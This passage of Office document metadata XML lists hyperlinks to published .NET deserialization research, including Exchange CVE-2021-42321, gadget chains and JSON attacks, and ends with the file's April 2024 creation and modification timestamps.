        <vt:lpwstr>https://testbnull.medium.com/some-notes-of-microsoft-exchange-deserialization-rce-cve-2021-42321-f6750243cdcd</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>6357095</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>12</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://muffsec.com/blog/finding-a-new-datacontractserializer-rce-gadget-chain/</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>4194382</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>9</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13th-Json-Attacks.pdf</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>4390977</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>6</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://learn.microsoft.com/en-us/dotnet/api/system.comparison-1?view=net-7.0</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>3670120</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>3</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://googleprojectzero.blogspot.com/2017/04/</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>1835097</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://twitter.com/tiraniddo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3</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-04-11T12:12:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-04-11T12:29:00Z</dcterms:modified>
</cp:coreProperties>
</file>